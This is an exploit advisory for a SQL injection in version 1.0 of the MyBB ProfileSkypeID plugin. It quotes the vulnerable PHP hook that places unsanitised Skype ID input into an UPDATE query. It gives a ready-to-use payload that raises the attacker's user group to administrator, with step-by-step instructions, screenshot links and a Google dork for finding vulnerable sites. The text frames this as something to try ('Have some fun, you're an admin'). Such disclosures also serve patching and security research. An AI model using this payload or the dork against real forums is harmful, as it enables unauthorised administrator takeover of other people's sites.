# Exploit Title:
# Google Dork: intext:"Skype ID Skype ID:" inurl:member
# Date: 12.20.2012
# Exploit Author: Zixem
# Software Link: http://mods.mybb.com/view/user-profile-skype-id
# Version: 1.0
# Tested on: Linux.
----------------------------------------------
ProfileSkypeID plugin suffers from SQL Injection in UPDATE query.
The vulnerabillity exist within profileskype.php which located in /inc/plugins/ folder.
<?php
$plugins->add_hook("datahandler_user_update", "profileskype_update"); /*Line 15*/
function profileskype_update($skype) /*Line 167*/
{
global $mybb;
if (isset($mybb->input['skype']))
{
$skype->user_update_data['skype'] = $mybb->input['skype'];
}
}
?>
How to exploit:
(1) Go to usercp.php?action=profile
(2) Insert this following string in your Skype ID: zix', usergroup='4
(3) Have some fun, you're an admin.
Proof of concept:
(1) Writing the injection: http://i.imgur.com/hg3FW.png
(2) Updates the profile and waiting a few seconds: http://i.imgur.com/fkwdi.png
(3) You're an admin: http://i.imgur.com/JIkRX.png
----------------------------------------------
[*] Follow for more: http://twitter.com/z1xem
[*] http://zixem.altervista.org/
[*] http://zentrixplus.net/